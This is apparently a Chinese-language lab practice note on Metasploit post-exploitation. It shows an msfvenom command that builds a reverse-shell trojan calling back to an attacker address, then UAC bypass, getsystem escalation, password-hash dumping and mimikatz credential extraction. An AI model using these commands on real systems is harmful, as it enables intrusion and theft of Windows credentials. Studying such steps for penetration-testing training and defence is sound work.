上线
先利用命令生成一个马:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.234.151 lport=2345 -f exe >hackergugu.exe
然后我们再去监听:
use exploit/multi/handler
我们在目标机器上,运行生成的木马,现在已经上线
利用getuid
获取当前的用户
hashdump
我们尝试运行命令hashdump
出现这段字呢。”priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.” 大致的原因就是权限不够吧。
(但是后来就算我提权了,还是没有解决掉这个问题,所以环境各种各样很奇葩,还是得多练,有经验了就好了)
我们也可以利用后渗透模块 run post/windows/gather/hashdump
还是没有成功,给我们说使用这个模块,我们需要得到一个system权限。后面紧跟着一个小提示,将进程转移到一个一个system权限下的进程。
提权
尝试命令getsystem
此命令尝试了四种提权方式,均失败。
失败的原因是目标机器存在uac,所以我们需要绕过uac。
background
,将当前会话移动到后台,为 session 1。
search bypassuac
,寻找绕过uac的exp。
我们选取第一个exp即可。
我们使用此exp时,我们仅需要设置session即可。如果bypass成功,就又会重新生成一个绕过uac的session。
上图中,包含了两个session。session1即为最初没有绕过uac的会话,session2即为绕过uac的会话。
我们再次尝试hashdump
。
无论哪一种命令,都还是失败的。所以这里要注意,绕过uac并不是拿到了system权限,绕过uac可以在一定程度上帮助我们拿到system权限。
例如接下来,我们在绕过uac的会话里,执行命令getsystem
,便提权成功了。
hashdump成功
另外再写一下mimikatz的用法。
mimikatz
load mimikatz
,先加载mimikatz
有三种命令可以获取明文密码,分别是
wdigest
kerberos
msv
这里有一点没太弄明白,一直出现 “mod_process::getVeryBasicModulesListForProcess : (0x0000012b) Ō�� ReadProcessMemory WriteProcessMemory �B n.a. (wdigest KO)”
操作是成功了,但是获取不到明文密码,暂时不清楚是什么原因。 也可能是因为每台机器的差异,实战的时候,因环境而已,多练就好了,最重要的是经验。